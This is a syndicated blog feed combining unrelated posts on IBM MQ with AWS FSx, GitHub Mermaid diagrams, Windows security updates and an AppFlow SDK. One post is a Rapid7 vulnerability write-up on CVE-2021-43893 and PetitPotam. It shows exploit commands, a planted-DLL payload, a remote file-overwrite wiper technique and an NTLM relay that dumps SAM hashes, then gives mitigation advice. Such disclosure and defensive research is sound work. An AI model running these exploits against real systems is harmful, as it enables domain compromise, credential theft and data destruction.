For applications using IBM MQ and requiring a higher file system throughput, Amazon provides Amazon FSx for NetApp ONTAP. This is a fully managed shared storage in the AWS Cloud, with the popular data access and management capabilities of ONTAP.

This blog explains how to use Amazon FSx for NetApp ONTAP for distributed storage and high availability with IBM MQ. Read more about Amazon FSx for NetApp ONTAP features, and performance details, throughput options, and performance tips.

Overview of IBM MQ architecture on AWS

For recovering queue data upon failure, you can set up IBM MQ with high availability.

The solution architecture is shown in Figure 1. This blog post assumes familiarity with AWS services such as Amazon EC2, VPCs, and subnets. For additional information on these topics, see the AWS documentation.

Figure 1. IBM MQ with Amazon FSx NetApp ONTAP

Figure 1. IBM MQ with Amazon FSx NetApp ONTAP

  1. IBM MQ is deployed in an Auto Scaling group spanning two Availability Zones.
  2. Amazon FSx NetApp ONTAP is used for data persistence and high availability of queue message data.
  3. Amazon FSx NetApp ONTAP is set up in the same Availability Zones as IBM MQ.
  4. Amazon FSx NetApp ONTAP provides automatic failover that is transparent to the application and completes in 60 seconds.

Considerations for the Amazon FSx NetApp ONTAP file system

When creating the Amazon FSx NetApp ONTAP file system as in Figure 1, consider the following:

  1. The subnets used for the file system should have connectivity with the subnets where your IBM MQ is running. See VPC documentation.
  2. Ensure that the security group(s) used by the elastic network interfaces (ENI) for Amazon FSx allow communication with the IBM MQ environment. Read more about limiting access security groups.
  3. When choosing the storage capacity, IOPS, and throughput capacity, make sure it aligns to your application requirements.
  4. If you choose to use AWS Key Management System (KMS) encryption, configure those details correctly.
  5. Be sure to provide an appropriate name for the volume junction, as you will use it to mount the file system onto your IBM MQ instance(s).
  6. Choose appropriate backup and maintenance windows according to your application needs.

Mount the Amazon FSx NetApp ONTAP file system onto the instance(s) where IBM MQ is running. Use either the DNS name or the IP address for the file system, as well as the correct volume junction name while mounting. Configure IBM MQ to make use of this mount for persisting the queue data.

This mount point must be included when updating fstab for Linux machines. This will allow for the file system to be mounted automatically in case the instance restarts. For Windows, take the appropriate steps to mount the file system automatically upon restart.

Conclusion

In this post, you have learned how to use Amazon FSx NetApp ONTAP with IBM MQ to maximize queue data throughput, while continuing to have persistent message storage. You can provision the Amazon FSx NetApp ONTAP file system, and mount its volume junction onto the IBM MQ instance(s).

Build a reliable, scalable, and cost-efficient IBM MQ solution on AWS, by using the fully elastic features that Amazon FSx NetApp ONTAP provides.

Related information:

Include diagrams in your Markdown files with Mermaid

Post Syndicated from Martin Woodward original https://github.blog/2022-02-14-include-diagrams-markdown-files-mermaid/

A picture tells a thousand words, but up until now the only way to include pictures and diagrams in your Markdown files on GitHub has been to embed an image. We added support for embedding SVGs recently, but sometimes you want to keep your diagrams up to date with your docs and create something as easily as doing ASCII art, but a lot prettier.

Enter Mermaid 🧜‍♀️🧜‍♂️

Mermaid is a JavaScript based diagramming and charting tool that takes Markdown-inspired text definitions and creates diagrams dynamically in the browser. Maintained by Knut Sveidqvist, it supports a bunch of different common diagram types for software projects, including flowcharts, UML, Git graphs, user journey diagrams, and even the dreaded Gantt chart.

Working with Knut and also the wider community at CommonMark, we’ve rolled out a change that will allow you to create graphs inline using Mermaid syntax, for example:

```mermaid
  graph TD;
      A-->B;
      A-->C;
      B-->D;
      C-->D;
```

The raw code block above will appear as this diagram in the rendered Markdown:

rendered diagram example

How it works

When we encounter code blocks marked as mermaid, we generate an iframe that takes the raw Mermaid syntax and passes it to Mermaid.js, turning that code into a diagram in your local browser.

We achieve this through a two-stage process—GitHub’s HTML pipeline and Viewscreen, our internal file rendering service.

First, we add a filter to the HTML pipeline that looks for raw pre tags with the mermaid language designation and substitutes it with a template that works progressively, such that clients requesting content with embedded Mermaid in a non-JavaScript environment (such as an API request) will see the original Markdown code.

Next, assuming the content is viewed in a JavaScript-enabled environment, we inject an iframe into the page, pointing the src attribute to the Viewscreen service. This has several advantages:

  • It offloads the library to an external service, keeping the JavaScript payload we need to serve from Rails smaller.
  • Rendering the charts asynchronously helps eliminate the overhead of potentially rendering several charts before sending the compiled ERB view to the client.
  • User-supplied content is locked away in an iframe, where it has less potential to cause mischief on the GitHub page that the chart is loaded into.

The net result is fast, easily editable, and vector-based diagrams right in your documentation where you need them.

Mermaid has been getting increasingly popular with developers and has a rich community of contributors led by the maintainer Knut Sveidqvist. We are very grateful for Knut’s support in bringing this feature to everyone on GitHub. If you’d like to learn more about the Mermaid syntax, head over to the Mermaid website or check out Knut’s first official Mermaid book.

Dropping Files on a Domain Controller Using CVE-2021-43893

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/02/14/dropping-files-on-a-domain-controller-using-cve-2021-43893/

Dropping Files on a Domain Controller Using CVE-2021-43893

On December 14, 2021, during the Log4Shell chaos, Microsoft published CVE-2021-43893, a remote privilege escalation vulnerability affecting the Windows Encrypted File System (EFS). The vulnerability was credited to James Forshaw of Google Project Zero, but perhaps owing to the Log4Shell atmosphere, the vulnerability gained little to no attention.

On January 13, 2022, Forshaw tweeted about the vulnerability.

Dropping Files on a Domain Controller Using CVE-2021-43893

The tweet suggests that CVE-2021-43893 was only issued a partial fix in the December 2021 update and that authenticated and remote users could still write arbitrary files on domain controllers. James linked to the Project Zero bug tracker, where an extended writeup and some proof-of-concept code was stored.

This vulnerability was of particular interest to me, because I had recently discovered a local privilege escalation (LPE) using file planting in a Windows product. The vulnerable product could reasonably be deployed on a system with unconstrained delegation, which meant I could use CVE-2021-43893 to remotely plant the file as a low-privileged remote user, turning my LPE into RCE.

I set out to investigate if the remote file-writing aspect of James Forshaw’s bug was truly unpatched. The investigation resulted in a few interesting observations:

  • Low-privileged user remote file-writing was patched in the December update. However, before the December update, a remote low-privileged user really could write arbitrary files on system-assigned unconstrained delegation.
  • Forced authentication and relaying are still not completely patched. Relay attacks initiated on the efsrpc named pipe have been known since inclusion in PetitPotam in July 2021. The issue seems to persist despite multiple patch attempts.

Although the file upload aspect of this vulnerability has been patched, I found the vulnerability quite interesting. The vulnerability is certainly limited by the restrictions on where a low-privileged user can create files on a Domain Controller, and maybe that is why the vulnerability didn’t receive more attention. But as I touched upon, it can be paired with a local vulnerability to achieve remote code execution, and as such, I thought it deserved more attention. I also have found the failure to properly patch forced authentication over the EFSRPC protocol to be worthy of more examination.

Inadequate EFSPRC forced authentication patching: A brief history of PetitPotam

PetitPotam was released in the summer of 2021 and was widely associated with an attack chain that starts as an unauthenticated and remote attacker and ends with domain administrator privileges. PetitPotam is only the beginning of that chain. It allows an attacker to force a victim Windows computer to authenticate to a third party (e.g. MITRE ATT&CK T118 – forced authentication). The full chain is interesting, but this discussion is only interested in the initial portion triggered by PetitPotam.

PetitPotam triggers forced authentication using the EFSRPC protocol. The original implementation of the exploit performed the attack over the lsarpc named pipe. The attack is quite simple. Originally, PetitPotam sent the victim server an EfsRpcOpenFileRaw request containing a UNC file path. Using a UNC path such as \\10.0.0.4\fake_share\fake_file forces the victim server to reach out to the third-party server, 10.0.0.4 in this example, in order to read off of the desired file share. The third-party server can then tell the victim to authenticate in order to access the share, and the victim obliges. The result is the victim leaks their Net-NTLM hash. That’s the whole thing. We will later touch on what an attacker can do with this hash, but for this section, that’s all we need to know.

Microsoft first attempted to patch the EFSRPC forced authentication in August 2021 by blocking the use of EfsRpcOpenFileRaw over the lsarpc named pipe. To do this, they added logic to efslsaext.dll’s EfsRpcOpenFileRaw_Downllevel function to check for a value stored in the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EFS\AllowOpenRawDL. Because this registry key doesn’t exist by default, a typical configuration will always fail this check.

Dropping Files on a Domain Controller Using CVE-2021-43893

That patch was inadequate, because EfsRpcOpenFileRaw isn’t the only EFSRPC function that accepts a UNC file path as a parameter. PetitPotam was quickly updated to use EfsRpcEncryptFileSrv, and just like that, the patch was bypassed.

The patch also failed to recognize that the lsarpc named pipe wasn’t the only named pipe that EFSRPC can be executed over. The efsrpc named pipe (among others) can also be used. efsrpc named pipe is slightly less desirable, since it requires the attacker to be authenticated, but the attack works over that pipe, and it doesn’t use the EfsRpcOpenFileRaw_Downlevel function. That means an attacker can also bypass the patch by switching named pipes.

As mentioned earlier, PetitPotam was updated in July 2021 to use the efsrpc named pipe. The following output shows PetitPotam forcing a Domain Controller patched through November 2021 to authenticate with an attacker controlled box running Responder.py (10.0.0.6) (I’ve left out the Responder bit since this is just meant to highlight the EFSRPC was available and unpatched for months).

albinolobster@ubuntu:~/impacket/examples$ python3 petitpotam.py -pipe efsr -u 'lowlevel' -p ‘cheesed00dle!' -d okhuman.ninja  10.0.0.6 10.0.0.5 

                                                                                               
              ___            _        _      _        ___            _                     
             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
                                         
              PoC to elicit machine account authentication via some MS-EFSRPC functions
                                      by topotam (@topotam77)
      
                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN



[-] Connecting to ncacn_np:10.0.0.5[\PIPE\efsrpc]
[+] Connected!
[+] Binding to df1941c5-fe89-4e79-bf10-463657acf44d
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!

Not only did Microsoft fail to patch the issue, but they didn’t issue follow-up patches for months. They also haven’t updated their advisory indicating the vulnerability has been exploited in the wild, despite its inclusion in CISA’s Known Exploited Vulnerability Catalog.

Dropping Files on a Domain Controller Using CVE-2021-43893

In December 2021, Microsoft released a patch for a different EFSRPC vulnerability: CVE-2021-43217. As part of the remediation for that issue, Microsoft implemented some hardening measures on EFSRPC communication. In particular, EFSRPC clients would need to use RPC_C_AUTHN_LEVEL_PKT_PRIVACY when using EFSRPC. If the client fails to do so, then the client is rejected and a Windows application event is generated.

Dropping Files on a Domain Controller Using CVE-2021-43893

At the time of the December patch, PetitPotam didn’t use this specific setting. However, a quick update allowed the exploit to comply with the new requirement and get back to leaking machine account NTLM hashes of fully patched Windows machines.

CVE-2021-43893: Windows EFS remote file upload

James Forshaw’s CVE-2021-43893 dives deeper into the EFSRPC functionality, but the heart of the issue is still a UNC file path problem. PetitPotam’s UNC path pointed to an external server, but CVE-2021-43893 points internally using the UNC path: \\.\C:\. Using a UNC path that points to the victim’s local file system allows attackers to create files and directories on the victim file system.

There are two major caveats to this vulnerability. First, the file-writing aspect of this vulnerability only appears to work on systems with unconstrained delegation. That’s fine if you are only interested in Domain Controllers, but less good if you are only interested in workstations.

Second, the victim server is impersonating the attacker when the file manipulation occurs. This means a low-privileged attacker can only write to the places where they have permission (e.g. C:\ProgramData\). Therefore, exploitation resulting in code execution is not a given. Still, while code execution isn’t guaranteed, there are many plausible scenarios that could lead there.

A plausible scenario leading to RCE using CVE-2021-43893

My interest in this vulnerability started with a local privilege escalation that I wanted to convert into remote code execution as a higher-privileged user. We can’t yet share the LPE as it’s still unpatched, but we can create a plausible scenario that demonstrates the ability to achieve code execution.

Microsoft has long maintained that Microsoft services vulnerable to DLL planting via a world writable %PATH% directory are won’t-fix low-security issues — a weird position given the effort it would take to fix such issues. But regardless, exploiting world-writable %PATH to escalate privileges via a Windows service (MITRE ATT&CK – Hijack Execution Flow: DLL Search Order Hijacking) is a useful technique when it’s available.

There’s a well-known product that installs itself into a world-writable directory: Python 2.7, all the way through it’s final release 2.7.18.

C:\Users\administrator>icacls.exe C:\Python27\
C:\Python27\ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(F)
             BUILTIN\Users:(I)(OI)(CI)(RX)
             BUILTIN\Users:(I)(CI)(AD)
             BUILTIN\Users:(I)(CI)(WD)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Successfully processed 1 files; Failed processing 0 files

The Python 2.7 installer drops files into C:\Python27\ and provides the user with the following instructions:

Besides using the automatically created start menu entry for the Python interpreter, you might want to start Python in the DOS prompt. To make this work, you need to set your %PATH% environment variable to include the directory of your Python distribution, delimited by a semicolon from other entries. An example variable could look like this (assuming the first two entries are Windows’ default):

C:\WINDOWS\system32;C:\WINDOWS;C:\Python25

Typing python on your command prompt will now fire up the Python interpreter. Thus, you can also execute your scripts with command line options, see Command line documentation.

Following these instructions, we now have a world-writable directory in %PATH% — which is, of course, the exploitable condition we were looking for. Now we just have to find a Windows service that will search for a missing DLL in C:\Python27\. I quickly accomplished this task by restarting all the running services on a test Windows Server 2019 and watching procmon. I found a number of services will search C:\Python27\ for:

  • fveapi.dll
  • cdpsgshims.dll

To exploit this, we just need to drop a “malicious” DLL named fveapi.dll or cdpsgshims.dll in C:\Python27. The DLL will be loaded when a vulnerable service restarts or the server reboots.

For this simple example, the “malicious” dll just creates the file C:\r7.txt:

#include <Windows.h>

HANDLE hThread;
DWORD dwThread;

DWORD WINAPI doCreateFile(LPVOID)
{
    HANDLE createFile = CreateFileW(L"C:\\r7.txt", GENERIC_WRITE, NULL, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
    CloseHandle(createFile);
    return 0;
}

BOOL APIENTRY DllMain( HMODULE, DWORD  ul_reason_for_call, LPVOID)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        hThread = CreateThread(NULL, 0, doCreateFile, NULL, 0, &dwThread);
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

After compiling the DLL, an attacker can remotely drop the file into C:\Python27 using CVE-2021-43893. The following is the output from our refactored and updated version of Forshaw’s original proof of concept. The attacker is attempting to remotely write the DLL on 10.0.0.6 (vulnerable.okhuman.ninja):

C:\ProgramData>whoami
okhuman\lowlevel

C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Python27\fveapi.dll -i ./dll_inject64.dll
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
[+] Attempting to write to \\.\C:\Python27\fveapi.dll
[+] Encrypt the empty remote file...
[+] Reading the encrypted remote file object
[+] Read back 1244 bytes
[+] Writing 92160 bytes of attacker data to encrypted object::$DATA stream
[+] Decrypt the the remote file
[!] Success!

C:\ProgramData>

The attack yields the desired output, and the file is written to C:\Python27\ on the remote target.

Dropping Files on a Domain Controller Using CVE-2021-43893

Below is the Procmon output demonstrating successful code execution as NT AUTHORITY\ SYSTEM when the “DFS Replication” service is restarted. Note that the malicious DLL is loaded and the file “C:\r7.txt” is created.

Dropping Files on a Domain Controller Using CVE-2021-43893

Do many administrators install Python 2.7 on their Domain Controller? I hope not. That wasn’t really the point. The point is that exploitation using this technique is plausible and worthy of our collective attention to ensure that it gets patched and monitored for exploitation.

What can a higher-privileged user do?

Oddly, administrators can do anything a low-level user can do except write data to files. When the administrator attempts to write to a file using Forshaw’s ::DATA stream technique, the result is an ACCESS DENIED error. Candidly, I didn’t investigate why.

However, it is interesting to note that the administrative user can remotely overwrite all files. This doesn’t serve much purpose from an offensive standpoint, but would serve as an easy, low-effort wiper or data destruction attack. Here is a silly example of remotely overwriting calc.exe from an administrator account.

C:\ProgramData>whoami
okhuman\test_admin

C:\ProgramData>.\blankspace.exe -r vulnerable.okhuman.ninja -f \\.\C:\Windows\System32\calc.exe -s "aaaaaaaaaaaa"
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to vulnerable.okhuman.ninja
[+] Attempting to write to \\.\C:\Windows\System32\calc.exe
[+] Encrypt the empty remote file...
[-] EfsRpcEncryptFileSrv failed with status code: 5

C:\ProgramData>

As you can see from the output, the tool failed with status code 5 (Access Denied). However, calc.exe on the remote device was successfully overwritten.

Dropping Files on a Domain Controller Using CVE-2021-43893

Technically speaking, this doesn’t really represent a security boundary being crossed. Administrators typically have access to \host\C$ or \host\admin$, but the difference in behavior seemed worth mentioning. I’d also note that as of February 2022, administrative users can still do this using \\localhost\C$\Windows\System32\calc.exe.

Forshaw also mentioned in his original writeup, and I confirmed, that this attack generates the attacking user’s roaming profile on the victim server. That could be a pretty interesting file-upload vector if the Active Directory environment synchronizes roaming directories. Again, I didn’t investigate that any further, but it could be useful in the correct environment.

Forced authentication still not entirely patched

The December 2021 patch brought multiple changes to efslsaext.dll and resulted in partial mitigation of CVE-2021-43893. One of the changes was the introduction of two new functions: EfsEnsureLocalPath and EfsEnsureLocalHandle. EfsEnsureLocalPath grabs a HANDLE for the attacker provided file using CreateW. The HANDLE is then passed to EfsEnsureLocalHandle, which passes the HANDLE to NtQueryVolumeInformationFile to validate the characteristics flag doesn’t contain FILE_REMOTE_DEVICE.

Dropping Files on a Domain Controller Using CVE-2021-43893

Because the patch still opens a HANDLE using the attacker-controlled file path, EFSRPC remains vulnerable to forced authentication and relay attacks of the machine account.

Demonstration of the forced authentication and relay does not require the complicated attack often associated with PetitPotam. We just need three boxes:

The Relay (10.0.0.3): A Linux system running ntlmrelayx.py.
The Attacker (10.0.0.6): A fully patched Windows 10 system.
The Victim (10.0.0.12): A fully patched Windows Server 2019 system.

The only caveat for this example is that the victim’s machine account (aka computer account) is assigned to the Domain Admins group. Below, you can see the machine account for 10.0.0.12, YEET$, is a member of Domain Admins.

Dropping Files on a Domain Controller Using CVE-2021-43893

This may not be a common configuration, but it’s common enough that it’s been the subject of a couple excellent writeups.

The attack is launched by a low-privileged user on 10.0.0.6 using the blankspace.exe proof of concept. The attack will force 10.0.0.12 (yet.okhuman.ninja) to authenticate to the attacker relay at 10.0.0.3

C:\ProgramData>blankspace.exe -r yeet.okhuman.ninja -f \\10.0.0.3\r7\r7 --relay
 ____    ___                    __          ____
/\  _`\ /\_ \                  /\ \        /\  _`\
\ \ \L\ \//\ \      __      ___\ \ \/'\    \ \,\L\_\  _____      __      ___     __
 \ \  _ <'\ \ \   /'__`\  /' _ `\ \ , <     \/_\__ \ /\ '__`\  /'__`\   /'___\ /'__`\
  \ \ \L\ \\_\ \_/\ \L\.\_/\ \/\ \ \ \\`\     /\ \L\ \ \ \L\ \/\ \L\.\_/\ \__//\  __/
   \ \____//\____\ \__/.\_\ \_\ \_\ \_\ \_\   \ `\____\ \ ,__/\ \__/.\_\ \____\ \____\
    \/___/ \/____/\/__/\/_/\/_/\/_/\/_/\/_/    \/_____/\ \ \/  \/__/\/_/\/____/\/____/
                                                        \ \_\
                                                         \/_/
[+] Creating EFS RPC binding handle to yeet.okhuman.ninja
[+] Sending EfsRpcDecryptFileSrv for \\10.0.0.3\r7\r7
[-] EfsRpcDecryptFileSrv failed with status code: 53
[+] Network path not found error received!
[!] Success!

C:\ProgramData>

The Linux relay is running ntlmrelayx.py and configured to relay the YEET$ authentication to 10.0.0.6 (the original attacker box). Below, you can see ntlmrelayx.py capture the authentication and send it on to 10.0.0.6.

albinolobster@ubuntu:~/impacket/examples$ sudo python3 ntlmrelayx.py -debug -t 10.0.0.6 -smb2support 
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[*] SMBD-Thread-4: Connection from OKHUMAN/[email protected] controlled, attacking target smb://10.0.0.6
[*] Authenticating against smb://10.0.0.6 as OKHUMAN/YEET$ SUCCEED

The relay is now authenticated to 10.0.0.6 as YEET$, a domain administrator. It can do pretty much as it pleases. Below, you can see it dumps the local SAM database.

[*] Target system bootKey: 0x9f868ddb4e1dfc56d992aa76ff931df4
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6aa01bb4a68e7fd8650cdeb6ad2b63ec:::
[+] NewStyle hashes is: True
albinolobster:1000:aad3b435b51404eeaad3b435b51404ee:430ef7587d6ac4410ac8b78dd5cc2bbe:::
[*] Done dumping SAM hashes for host: 10.0.0.6

It’s as easy as that. All you have to do is find a host with a machine account in the domain admins group:

C:\ProgramData>net group "domain admins" /domain
The request will be processed at a domain controller for domain okhuman.ninja.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members

-------------------------------------------------------------------------------
Administrator            test_domain_admin        YEET$
The command completed successfully.


C:\ProgramData>

Once you have that, a low-privileged remote attacker can use EFSRPC to relay and escalate to other machines. However, the attack isn’t exactly silent. On 10.0.0.6, event ID 4624 was created when the 10.0.0.3 relay logged in using the YEET$ machine account.

Dropping Files on a Domain Controller Using CVE-2021-43893

Final thoughts and remediation

What began as an investigation into using an unpatched remote file-write vulnerability ended up being a history lesson in EFSRPC patches. The remote file-write vulnerability that I originally wanted to use has been patched, but we demonstrated the forced authentication issue hasn’t been adequately fixed. There is no doubt that Windows developers have a tough job. However, a lot of the issues discussed here could have been easily avoided with a reasonable patch in August 2021. The fact that they persist today says a lot about the current state of Windows security.

To mitigate these issues as best as possible, as always, ensure your systems are successfully updated monthly. Microsoft has released multiple advisories with recommendations regarding NTLM Relay-based attacks (see: Microsoft Security Advisory 974926
and KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS). The most important advice is to ensure SMBv1 no longer exists in your environment and to require SMB signing.

Some other general advice:

  • Monitoring for event ID 4420 in Windows application event logs can help detect EFSRPC-based hacking tools.
  • Monitor for event ID 4624 in Windows security event logs for remote machine account authentication.
  • Audit machine accounts to ensure they are not members of Domain Admins.
    If possible, audit %PATH% of critical systems to ensure no world-writable path exists.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2021-43893 with authenticated vulnerability checks available in the December 15, 2021 content release.

Metasploit Framework users can test their exposure to forced authentication attacks with a new PetitPotam module available in the 6.1.29 release.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Security updates for Monday

Post Syndicated from original https://lwn.net/Articles/884757/

Security updates have been issued by Debian (debian-edu-config, expat, minetest, pgbouncer, python2.7, samba, thunderbird, and varnish), Fedora (dotnet-build-reference-packages, dotnet3.1, dotnet6.0, hostapd, libdxfrw, librecad, mingw-expat, mingw-gdk-pixbuf, php-twig2, php-twig3, rust-afterburn, webkit2gtk3, and xstream), Mageia (bluez, firefox, libarchive, php-adodb, thunderbird, and webkit2), openSUSE (ghostscript, openexr, permissions, SDL2, and wireshark), Red Hat (firefox), Slackware (mariadb), and SUSE (busybox, ghostscript, openexr, permissions, SDL2, and wireshark).

Building custom connectors using the Amazon AppFlow Custom Connector SDK

Post Syndicated from James Beswick original https://aws.amazon.com/blogs/compute/building-custom-connectors-using-the-amazon-appflow-custom-connector-sdk/

This post is written by Kamen Sharlandjiev, Sr. Specialist SA, Integration, Ray Jang, Principal PMT, Amazon AppFlow, and Dhiraj Mahapatro, Sr. Specialist SA, Serverless.

Amazon AppFlow is a fully managed integration service that enables you to transfer data securely between software as a service (SaaS) applications like Salesforce, SAP, Zendesk, Slack, ServiceNow, and AWS services like Amazon S3 and Amazon Redshift. Amazon AppFlow lets you run enterprise-scale data flows on a schedule, in response to business events, or on-demand.

Overview diagram

Amazon AppFlow is a managed integration service that replaces the heavy-lifting of developing, maintaining, and updating connectors. It supports bidirectional integration between external SaaS applications and AWS services.

The Custom Connector Software Development Kit (SDK) now makes it easier to integrate with private API endpoints, proprietary applications, or other cloud services. It provides access to all available managed integrations and the ability to build your own custom integration as part of the integrated experience. The SDK is open-source and available for Java or Python.

You can deploy custom connectors built with the SDK in different ways:

  • Private – The connector is available only inside the AWS account where deployed.
  • Shared – The connector can be shared for use with other AWS accounts.
  • Public – Publish connectors on the AWS Marketplace for free or charge a subscription fee. For more information, refer to Sharing AppFlow connectors via AWS Marketplace.

Overview

This blog takes you through building and deploying your own Amazon AppFlow Custom Connector using the Java SDK. The sample application shows how to build your first custom connector with Amazon AppFlow.

Custom connector flow

The process of building, deploying, and using a custom connector is:

  1. Create a custom connector as an AWS Lambda function using the Amazon AppFlow Custom Connector SDK.
  2. Deploy the custom connector Lambda function, which provides the serverless compute for the connector.
  3. Lambda function integrates with a SaaS application or private API.
  4. Register the custom connector with Amazon AppFlow.
  5. Users can now use this custom connector in the Amazon AppFlow service.

Building an Amazon AppFlow custom connector

The sample application used in this blog creates a new custom connector that implements a MySQL JDBC driver. With this connector, you can connect to a remote MySQL or MariaDB instance to read and write data.

The SDK allows you to build custom connectors and use the service’s built-in authentication support for: OAuth2, API key, and basic auth. For other use cases, such as JDBC, you must create your own custom authentication implementation.

The SDK includes the source code for an example Salesforce connector. This highlights a complete use case for a source and destination Amazon AppFlow connector using OAuth2 as authentication.

Details

There are three mandatory Java interfaces that a connector must implement:

  1. ConfigurationHandler.java: Defines the functionality to implement connector configurations, and credentials-related operations.
  2. MetadataHandler.java: Represents the functionality to implement for objects metadata.
  3. RecordHandler.java: Defines functionality to implement record-related CRUD operations.

Prerequisites

Ensure that the following software is installed on your workstation:

  1. Java 11
  2. Maven
  3. AWS CLI
  4. AWS SAM CLI

To run the sample application:

  1. Clone the code repository:
    git clone https://github.com/aws-samples/amazon-appflow-custom-jdbc-connector.git
    
    cd amazon-appflow-custom-jdbc-connector
  2. After cloning the sample application, visit these Java classes for more details:

To add JDBC clients for other database engines, implement JDBCClient.java interface. The custom connector uses a Lambda function as a POJO class to handle requests. The SDK provides an abstract BaseLambdaConnectorHandler class that, which you use as follows:

import com.amazonaws.appflow.custom.connector.lambda.handler.BaseLambdaConnectorHandler;

public class JDBCConnectorLambdaHandler extends BaseLambdaConnectorHandler {

  public JDBCConnectorLambdaHandler() {
    super(
      new JDBCConnectorMetadataHandler(),
      new JDBCConnectorRecordHandler(),
      new JDBCConnectorConfigurationHandler()
    );
  }
}

Local testing and debugging

While developing the connector specific functionality, developers require local testing capability to build and debug faster. The SDK and the example connector provides examples on testing custom connectors.

Additionally, you can experiment with JUnit and the DSL builders provided by the SDK. The JUnit test allows you to test this implementation locally by simulating an appropriate request to the Lambda functions. You can use debug points and step into the code implementation from start to end using the built-in IDE debugger. The sample application comes with example of JUnit tests that can be used with debug points.

Credentials management 

Amazon AppFlow stores all sensitive information in AWS Secrets Manager. The secret is created when you create a connector profile. The secret ARN is passed in the ConnectorContext that forms part of the Lambda function’s invocation request.

To test locally:

  • Mock the “CredentialsProvider” and stub out the response of GetCredentials API. Note that the CredentialProvider provides several different GetCredentials methods, depending on the authentication used.
  • Create a secret in AWS Secrets Manager. Configure an IAM user with programmatic access and sufficient permissions to allow the secretsmanager:GetSecretValue action and let the CredentialsProvider call Secrets Manager locally. When you initialize a new service client without supplying any arguments, the SDK attempts to find AWS credentials by using the default credential provider chain.

For more information, read Working with AWS Credentials (SDK for Java) and Creating an IAM user with programmatic access.

Deploying the Lambda function in an AWS account

This example connector package provides an AWS Serverless Application Model (AWS SAM) template in the project folder. It describes the following resources:

  1. The Lambda function containing the custom connector code.
  2. The AWS IAM policy, allowing the function to read secrets from AWS Secrets Manager.
  3. The AWS Lambda policy permission allowing Amazon AppFlow to invoke the Lambda function.

The sample application’s AWS SAM template provides two resources:

AWSTemplateFormatVersion: '2010-09-09'
Transform: 'AWS::Serverless-2016-10-31'
Description: Template to deploy the lambda connector in your account.
Resources:
  ConnectorFunction:
    Type: 'AWS::Serverless::Function'
    Properties:
      Handler: "org.custom.connector.jdbc.handler.JDBCConnectorLambdaHandler::handleRequest"
      CodeUri: "./target/appflow-custom-jdbc-connector-jdbc-1.0.jar"
      Description: "AppFlow custom JDBC connector example"
      Runtime: java11
      Timeout: 30
      MemorySize: 1024
      Policies:
        Version: '2012-10-17'
        Statement:
          Effect: Allow
          Action: 'secretsmanager:GetSecretValue'
          Resource: !Sub 'arn:aws:secretsmanager:${AWS::Region}:${AWS::AccountId}:secret:appflow!${AWS::AccountId}-*'

